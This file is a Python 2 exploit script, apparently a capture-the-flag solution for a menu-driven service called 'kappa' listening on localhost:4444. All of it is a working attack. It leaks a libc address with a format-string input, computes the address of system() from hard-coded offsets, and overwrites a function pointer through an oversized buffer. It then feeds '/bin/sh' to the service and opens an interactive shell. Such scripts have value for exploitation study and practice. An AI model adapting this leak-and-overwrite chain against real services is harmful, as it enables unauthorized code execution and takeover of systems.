kappa
#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket, struct, telnetlib
def sock(remoteip, remoteport):
    """Open a TCP connection to ``(remoteip, remoteport)``.

    Returns:
        A ``(socket, file)`` pair: the raw socket for ``send``/``recv`` and an
        unbuffered read/write file object layered over it.  ``bufsize=0`` is
        the Python 2 ``socket.makefile`` signature; Python 3 spells the same
        argument ``buffering=0``.
    """
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.connect((remoteip, remoteport))
    stream = conn.makefile('rw', bufsize=0)
    return conn, stream
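def read_until(f, delim='\n'):
    """Read *f* one character at a time until the data read ends with *delim*.

    Args:
        f: file-like object exposing ``read(n)`` (the file half of ``sock``).
        delim: terminator to stop at; it is included in the returned data.

    Returns:
        Everything read so far, *delim* included.

    Raises:
        EOFError: if *f* is exhausted before *delim* is seen.  The original
            version spun forever here, because ``read(1)`` keeps returning an
            empty string once the peer closes the connection.
    """
    data = ''
    while not data.endswith(delim):
        chunk = f.read(1)
        if not chunk:
            raise EOFError('stream closed before delimiter %r was seen' % (delim,))
        data += chunk
    return data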
def p(a):
    """Pack integer *a* as a 4-byte little-endian unsigned value (``<I``)."""
    little_u32 = struct.Struct("<I")
    return little_u32.pack(a)
def u(a):
    """Unpack the first 4 bytes of *a* as a little-endian unsigned int (``<I``)."""
    little_u32 = struct.Struct("<I")
    (value,) = little_u32.unpack(a)
    return value
def shell(s):
    """Attach an interactive ``telnetlib`` session to the connected socket *s*.

    ``Telnet.interact()`` relays stdin to the socket and socket output to
    stdout until either side closes.  ``telnetlib`` is deprecated since
    Python 3.11 and removed in 3.13.
    """
    session = telnetlib.Telnet()
    session.sock = s
    session.interact()
# Target-specific constants: addresses and offsets hard-coded for the exact
# binary and libc build this script was written against; nothing below
# discovers them at runtime.
read_got = 0x804aeb4  # assigned but never referenced in this script
printf_plt = 0x8048520
leak_libc_start_offset = 243
libc_start_offset = 0x19990
libc_system_offset = 0x40190
# Python 2 only: str doubles as the byte string handed to send()/struct,
# and print is used as a statement.
s, f = sock('localhost', 4444)
# Menu input for the service on localhost:4444, written without waiting for
# prompts; the responses are consumed further down via read_until().
s.send('1\n1\n2\naaaaaaaaaaaaa\n')
s.send('1\n1\n2\naaaaaaaaaaaaa\n')
s.send('1\n1\n2\naaaaaaaaaaaab\n')
s.send('1\n1\n2\naaaaaaaaaaaaa\n')
s.send('1\n1\n3\n')
s.send('1\n1\n3\n')
s.send('1\n1\n1\n1\n1\n2\n')
s.send('%23$xaaaaaaaa\n')
s.send('5\n')
s.send('5\n5\n')
# Fixed-size buffer: 513 filler bytes, one packed address, padded to 0x850.
payload = ''
payload += 'a'*513
payload += p(printf_plt)
payload += 'a'*(0x850-len(payload))
s.send(payload)
s.send('3\n')
# Drain the responses to the inputs above, then take the 8-character hex
# value that follows 'Attack: Tackle\n'.  Assumes all 8 characters arrive in
# this single recv() call — TODO confirm; a short read breaks int(..., 16).
read_until(f, 'aaaaaaaaaaaab')
read_until(f, 'aaaaaaaaaaaab')
read_until(f, 'aaaaaaaaaaaab')
read_until(f, 'Attack: Tackle\n')
leak_libc_start_addr = int(s.recv(8), 16)
# Derive the libc base and the system() address from the leaked value using
# the offsets defined at the top.
libc_start_addr = leak_libc_start_addr - leak_libc_start_offset
libc_base = libc_start_addr - libc_start_offset
libc_system_addr = libc_base + libc_system_offset
print '[*] libc base: {}'.format(hex(libc_base))
print '[*] libc system: {}'.format(hex(libc_system_addr))
# Second pass through the same menu sequence, this time with the computed
# system() address in the payload.
s.send('1\n3\n')
s.send('1\n1\n3\n')
s.send('1\n1\n3\n')
s.send('1\n1\n3\n')
s.send('1\n1\n3\n')
s.send('1\n1\n3\n')
s.send('1\n1\n1\n1\n1\n1\n2\n')
s.send('/bin/sh\x00aaaaa\n')
s.send('5\n')
s.send('5\n5\n')
payload = ''
payload += 'a'*513
payload += p(libc_system_addr)
payload += 'a'*(0x850-len(payload))
s.send(payload)
s.send('3\n')
print '[+] Shell'
shell(s)